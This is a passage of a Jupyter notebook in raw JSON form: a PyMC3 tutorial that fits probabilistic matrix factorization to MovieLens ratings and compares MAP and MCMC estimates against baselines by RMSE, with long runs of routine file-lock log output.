/Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079184848 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478066337488 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478066337488 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097278000 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478097278000 released on 
/Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096729520 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478096729520 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084013984 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478084013984 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478066083824 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478066083824 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478055909600 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478055909600 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478113503888 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478113503888 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478118183696 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478118183696 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478118205424 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478118205424 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203189616 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203189616 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203877312 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203877312 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203831872 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203831872 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203900544 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203900544 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203903568 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203903568 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478120579664 acquired on 
/Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478120579664 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478204186048 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478204186048 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203733232 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203733232 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203766624 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203766624 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478175077760 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478175077760 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478204756800 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478204756800 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478204154064 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478204154064 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478204137088 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478204137088 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478204179072 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478204179072 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\n"
]
],
[
[
"Excellent. The first thing we want to do is make sure the MAP estimate we obtained is reasonable. We can do this by computing RMSE on the predicted ratings obtained from the MAP values of $U$ and $V$. First we define a function for generating the predicted ratings $R$ from $U$ and $V$. We ensure the actual rating bounds are enforced by setting all values below 1 to 1 and all values above 5 to 5. Finally, we compute RMSE for both the training set and the test set. We expect the test RMSE to be higher. The difference between the two gives some idea of how much we have overfit. Some difference is always expected, but a very low RMSE on the training set with a high RMSE on the test set is a definite sign of overfitting.",
"_____no_output_____"
]
],
[
[
"def eval_map(pmf_model, train, test):\n U = pmf_model.map[\"U\"]\n V = pmf_model.map[\"V\"]\n\n # Make predictions and calculate RMSE on train & test sets.\n predictions = pmf_model.predict(U, V)\n train_rmse = rmse(train, predictions)\n test_rmse = rmse(test, predictions)\n overfit = test_rmse - train_rmse\n\n # Print report.\n print(\"PMF MAP training RMSE: %.5f\" % train_rmse)\n print(\"PMF MAP testing RMSE: %.5f\" % test_rmse)\n print(\"Train/test difference: %.5f\" % overfit)\n\n return test_rmse\n\n\n# Add eval function to PMF class.\nPMF.eval_map = eval_map",
"_____no_output_____"
],
[
"# Evaluate PMF MAP estimates.\npmf_map_rmse = pmf.eval_map(train, test)\npmf_improvement = baselines[\"mom\"] - pmf_map_rmse\nprint(\"PMF MAP Improvement: %.5f\" % pmf_improvement)",
"PMF MAP training RMSE: 1.01099\nPMF MAP testing RMSE: 1.13324\nTrain/test difference: 0.12225\nPMF MAP Improvement: -0.10956\n"
]
],
[
[
"We actually see a decrease in performance between the MAP estimate and the mean of means performance. We also have a fairly large difference in the RMSE values between the train and the test sets. This indicates that the point estimates for $\\alpha_U$ and $\\alpha_V$ that we calculated from our data are not doing a great job of controlling model complexity. \n\nLet's see if we can improve our estimates by approximating our posterior distribution with MCMC sampling. We'll draw 500 samples, with 500 tuning samples.",
"_____no_output_____"
],
[
"### Predictions using MCMC",
"_____no_output_____"
]
],
[
[
"# Draw MCMC samples.\npmf.draw_samples(\n draws=500,\n tune=500,\n)",
"/Users/CloudChaoszero/Documents/Projects-Dev/pymc3/pymc3/sampling.py:465: FutureWarning: In an upcoming release, pm.sample will return an `arviz.InferenceData` object instead of a `MultiTrace` by default. You can pass return_inferencedata=True or return_inferencedata=False to be safe and silence this warning.\n warnings.warn(\nAuto-assigning NUTS sampler...\nINFO:pymc3:Auto-assigning NUTS sampler...\nInitializing NUTS using jitter+adapt_diag...\nINFO:pymc3:Initializing NUTS using jitter+adapt_diag...\nINFO:filelock:Lock 140478073148560 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478073148560 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478068598672 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478068598672 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478072955088 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478072955088 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478071840096 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478071840096 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478248513648 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478248513648 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478236445712 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478236445712 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478253280848 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478253280848 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478256911744 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478256911744 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478256563200 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478256563200 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079204032 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478079204032 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478256618608 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478256618608 released on 
/Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478113502832 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478113502832 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257044064 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257044064 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257049456 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257049456 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478256931072 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478256931072 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257042576 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257042576 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257770704 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257770704 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257774016 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257774016 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257882928 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478257882928 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478202955760 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478202955760 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203831632 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203831632 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203735440 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203735440 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478175077568 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478175077568 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203167216 acquired on 
/Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478203167216 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478118129280 acquired on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nINFO:filelock:Lock 140478118129280 released on /Users/CloudChaoszero/.theano/compiledir_macOS-10.16-x86_64-i386-64bit-i386-3.8.6-64/.lock\nSequential sampling (1 chains in 1 job)\nINFO:pymc3:Sequential sampling (1 chains in 1 job)\nNUTS: [V, U]\nINFO:pymc3:NUTS: [V, U]\n"
]
],
[
[
"### Diagnostics and Posterior Predictive Check\n\nThe next step is to check how many samples we should discard as burn-in. Normally, we'd do this using a traceplot to get some idea of where the sampled variables start to converge. In this case, we have high-dimensional samples, so we need to find a way to approximate them. One way was proposed by [Salakhutdinov and Mnih, p.886](https://www.cs.toronto.edu/~amnih/papers/bpmf.pdf). We can calculate the Frobenius norms of $U$ and $V$ at each step and monitor those for convergence. This essentially gives us some idea when the average magnitude of the latent variables is stabilizing. The equations for the Frobenius norms of $U$ and $V$ are shown below. We will use `numpy`'s `linalg` package to calculate these.\n\n$$ \\|U\\|_{Fro}^2 = \\sqrt{\\sum_{i=1}^N \\sum_{d=1}^D |U_{id}|^2}, \\hspace{40pt} \\|V\\|_{Fro}^2 = \\sqrt{\\sum_{j=1}^M \\sum_{d=1}^D |V_{jd}|^2} $$",
"_____no_output_____"
]
],
[
[
"def _norms(pmf_model, monitor=(\"U\", \"V\"), ord=\"fro\"):\n \"\"\"Return norms of latent variables at each step in the\n sample trace. These can be used to monitor convergence\n of the sampler.\n \"\"\"\n monitor = (\"U\", \"V\")\n norms = {var: [] for var in monitor}\n for sample in pmf_model.trace:\n for var in monitor:\n norms[var].append(np.linalg.norm(sample[var], ord))\n return norms\n\n\ndef _traceplot(pmf_model):\n \"\"\"Plot Frobenius norms of U and V as a function of sample #.\"\"\"\n trace_norms = pmf_model.norms()\n u_series = pd.Series(trace_norms[\"U\"])\n v_series = pd.Series(trace_norms[\"V\"])\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 7))\n u_series.plot(kind=\"line\", ax=ax1, grid=False, title=r\"$\\|U\\|_{Fro}^2$ at Each Sample\")\n v_series.plot(kind=\"line\", ax=ax2, grid=False, title=r\"$\\|V\\|_{Fro}^2$ at Each Sample\")\n ax1.set_xlabel(\"Sample Number\")\n ax2.set_xlabel(\"Sample Number\")\n\n\nPMF.norms = _norms\nPMF.traceplot = _traceplot",
"_____no_output_____"
],
[
"pmf.traceplot()",
"_____no_output_____"
]
],
[
[
"It appears we get convergence of $U$ and $V$ after about the default tuning. When testing for convergence, we also want to see convergence of the particular statistics we are looking for, since different characteristics of the posterior may converge at different rates. Let's also do a traceplot of the RSME. We'll compute RMSE for both the train and the test set, even though the convergence is indicated by RMSE on the training set alone. In addition, let's compute a running RMSE on the train/test sets to see how aggregate performance improves or decreases as we continue to sample.\n\nNotice here that we are sampling from 1 chain only, which makes the convergence statisitcs like $\\hat{r}$ impossible (we can still compute the split-rhat but the purpose is different). The reason of not sampling multiple chain is that PMF might not have unique solution. Thus without constraints, the solutions are at best symmetrical, at worse identical under any rotation, in any case subject to label switching. In fact if we sample from multiple chains we will see large $\\hat{r}$ indicating the sampler is exploring different solutions in different part of parameter space.",
"_____no_output_____"
]
],
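[
[
"The rotational symmetry is easy to verify directly. This small, self-contained check (not part of the analysis itself) shows that rotating $U$ and $V$ by the same orthogonal matrix $Q$ leaves the predicted ratings $U V^T$ unchanged, which is why separate chains can settle on different but equivalent solutions:\n\n```python\nimport numpy as np\n\nrng = np.random.default_rng(0)\nU = rng.normal(size=(4, 3))\nV = rng.normal(size=(5, 3))\nQ, _ = np.linalg.qr(rng.normal(size=(3, 3)))  # a random orthogonal matrix\n\n# (U Q)(V Q)^T = U Q Q^T V^T = U V^T, so the predictions are identical.\nprint(np.allclose(U @ V.T, (U @ Q) @ (V @ Q).T))\n```",
"_____no_output_____"
]
],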
[
[
"def _running_rmse(pmf_model, test_data, train_data, burn_in=0, plot=True):\n \"\"\"Calculate RMSE for each step of the trace to monitor convergence.\"\"\"\n burn_in = burn_in if len(pmf_model.trace) >= burn_in else 0\n results = {\"per-step-train\": [], \"running-train\": [], \"per-step-test\": [], \"running-test\": []}\n R = np.zeros(test_data.shape)\n for cnt, sample in enumerate(pmf_model.trace[burn_in:]):\n sample_R = pmf_model.predict(sample[\"U\"], sample[\"V\"])\n R += sample_R\n running_R = R / (cnt + 1)\n results[\"per-step-train\"].append(rmse(train_data, sample_R))\n results[\"running-train\"].append(rmse(train_data, running_R))\n results[\"per-step-test\"].append(rmse(test_data, sample_R))\n results[\"running-test\"].append(rmse(test_data, running_R))\n\n results = pd.DataFrame(results)\n\n if plot:\n results.plot(\n kind=\"line\",\n grid=False,\n figsize=(15, 7),\n title=\"Per-step and Running RMSE From Posterior Predictive\",\n )\n\n # Return the final predictions, and the RMSE calculations\n return running_R, results\n\n\nPMF.running_rmse = _running_rmse",
"_____no_output_____"
],
[
"predicted, results = pmf.running_rmse(test, train)",
"_____no_output_____"
],
[
"# And our final RMSE?\nfinal_test_rmse = results[\"running-test\"].values[-1]\nfinal_train_rmse = results[\"running-train\"].values[-1]\nprint(\"Posterior predictive train RMSE: %.5f\" % final_train_rmse)\nprint(\"Posterior predictive test RMSE: %.5f\" % final_test_rmse)\nprint(\"Train/test difference: %.5f\" % (final_test_rmse - final_train_rmse))\nprint(\"Improvement from MAP: %.5f\" % (pmf_map_rmse - final_test_rmse))\nprint(\"Improvement from Mean of Means: %.5f\" % (baselines[\"mom\"] - final_test_rmse))",
"Posterior predictive train RMSE: 0.78051\nPosterior predictive test RMSE: 0.91320\nTrain/test difference: 0.13269\nImprovement from MAP: 0.22004\nImprovement from Mean of Means: 0.11048\n"
]
],
[
[
"We have some interesting results here. As expected, our MCMC sampler provides lower error on the training set. However, it seems it does so at the cost of overfitting the data. This results in a decrease in test RMSE as compared to the MAP, even though it is still much better than our best baseline. So why might this be the case? Recall that we used point estimates for our precision paremeters $\\alpha_U$ and $\\alpha_V$ and we chose a fixed precision $\\alpha$. It is quite likely that by doing this, we constrained our posterior in a way that biased it towards the training data. In reality, the variance in the user ratings and the movie ratings is unlikely to be equal to the means of sample variances we used. Also, the most reasonable observation precision $\\alpha$ is likely different as well.",
"_____no_output_____"
],
[
"### Summary of Results\n\nLet's summarize our results.",
"_____no_output_____"
]
],
[
[
"size = 100 # RMSE doesn't really change after 100th sample anyway.\nall_results = pd.DataFrame(\n {\n \"uniform random\": np.repeat(baselines[\"ur\"], size),\n \"global means\": np.repeat(baselines[\"gm\"], size),\n \"mean of means\": np.repeat(baselines[\"mom\"], size),\n \"PMF MAP\": np.repeat(pmf_map_rmse, size),\n \"PMF MCMC\": results[\"running-test\"][:size],\n }\n)\nfig, ax = plt.subplots(figsize=(10, 5))\nall_results.plot(kind=\"line\", grid=False, ax=ax, title=\"RMSE for all methods\")\nax.set_xlabel(\"Number of Samples\")\nax.set_ylabel(\"RMSE\");",
"_____no_output_____"
]
],
[
[
"## Summary\n\nWe set out to predict user preferences for unseen movies. First we discussed the intuitive notion behind the user-user and item-item neighborhood approaches to collaborative filtering. Then we formalized our intuitions. With a firm understanding of our problem context, we moved on to exploring our subset of the Movielens data. After discovering some general patterns, we defined three baseline methods: uniform random, global mean, and mean of means. With the goal of besting our baseline methods, we implemented the basic version of Probabilistic Matrix Factorization (PMF) using `pymc3`.\n\nOur results demonstrate that the mean of means method is our best baseline on our prediction task. As expected, we are able to obtain a significant decrease in RMSE using the PMF MAP estimate obtained via Powell optimization. We illustrated one way to monitor convergence of an MCMC sampler with a high-dimensionality sampling space using the Frobenius norms of the sampled variables. The traceplots using this method seem to indicate that our sampler converged to the posterior. Results using this posterior showed that attempting to improve the MAP estimation using MCMC sampling actually overfit the training data and increased test RMSE. This was likely caused by the constraining of the posterior via fixed precision parameters $\\alpha$, $\\alpha_U$, and $\\alpha_V$.\n\nAs a followup to this analysis, it would be interesting to also implement the logistic and constrained versions of PMF. We expect both models to outperform the basic PMF model. We could also implement the [fully Bayesian version of PMF](https://www.cs.toronto.edu/~amnih/papers/bpmf.pdf) (BPMF), which places hyperpriors on the model parameters to automatically learn ideal mean and precision parameters for $U$ and $V$. This would likely resolve the issue we faced in this analysis. We would expect BPMF to improve upon the MAP estimation produced here by learning more suitable hyperparameters and parameters. For a basic (but working!) implementation of BPMF in `pymc3`, see [this gist](https://gist.github.com/macks22/00a17b1d374dfc267a9a).\n\nIf you made it this far, then congratulations! You now have some idea of how to build a basic recommender system. These same ideas and methods can be used on many different recommendation tasks. Items can be movies, products, advertisements, courses, or even other people. Any time you can build yourself a user-item matrix with user preferences in the cells, you can use these types of collaborative filtering algorithms to predict the missing values. If you want to learn more about recommender systems, the first reference is a good place to start.",
"_____no_output_____"
],
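[
"As a rough starting point for that follow-up, the fixed precisions could be replaced with hyperpriors. The sketch below is illustrative only: it is not the model used in this notebook, and the variable names, shapes, and Gamma prior parameters are all assumptions.\n\n```python\nimport pymc3 as pm\n\nn, m, dim = 1000, 1625, 10  # placeholder sizes: users, movies, latent dimensions\n\nwith pm.Model():\n    # Learn the latent precisions instead of fixing them from sample variances.\n    alpha_u = pm.Gamma(\"alpha_u\", alpha=2.0, beta=1.0)\n    alpha_v = pm.Gamma(\"alpha_v\", alpha=2.0, beta=1.0)\n    U = pm.Normal(\"U\", mu=0, tau=alpha_u, shape=(n, dim))\n    V = pm.Normal(\"V\", mu=0, tau=alpha_v, shape=(m, dim))\n    # ... likelihood on the observed ratings, as in the PMF model above ...\n```",
"_____no_output_____"
],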
[
"## References\n\n1. Y. Koren, R. Bell, and C. Volinsky, “Matrix Factorization Techniques for Recommender Systems,” Computer, vol. 42, no. 8, pp. 30–37, Aug. 2009.\n2. K. Goldberg, T. Roeder, D. Gupta, and C. Perkins, “Eigentaste: A constant time collaborative filtering algorithm,” Information Retrieval, vol. 4, no. 2, pp. 133–151, 2001.\n3. A. Mnih and R. Salakhutdinov, “Probabilistic matrix factorization,” in Advances in neural information processing systems, 2007, pp. 1257–1264.\n4. S. J. Nowlan and G. E. Hinton, “Simplifying Neural Networks by Soft Weight-sharing,” Neural Comput., vol. 4, no. 4, pp. 473–493, Jul. 1992.\n5. R. Salakhutdinov and A. Mnih, “Bayesian Probabilistic Matrix Factorization Using Markov Chain Monte Carlo,” in Proceedings of the 25th International Conference on Machine Learning, New York, NY, USA, 2008, pp. 880–887.\n\n\nThe model discussed in this analysis was developed by Ruslan Salakhutdinov and Andriy Mnih. Code and supporting text are the original work of [Mack Sweeney](https://www.linkedin.com/in/macksweeney) with changes made to adapt the code and text for the Movielens dataset by Colin Carroll and Rob Zinkov.\n\n\n",
"_____no_output_____"
]
],
[
[
"%load_ext watermark\n%watermark -n -u -v -iv -w",
"Last updated: Sun Feb 07 2021\n\nPython implementation: CPython\nPython version : 3.8.6\nIPython version : 7.20.0\n\nscipy : 1.6.0\nnumpy : 1.20.0\npandas : 1.2.1\nlogging : 0.5.1.2\npymc3 : 3.11.0\ntheano : 1.1.2\nmatplotlib: None\n\nWatermark: 2.1.0\n\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
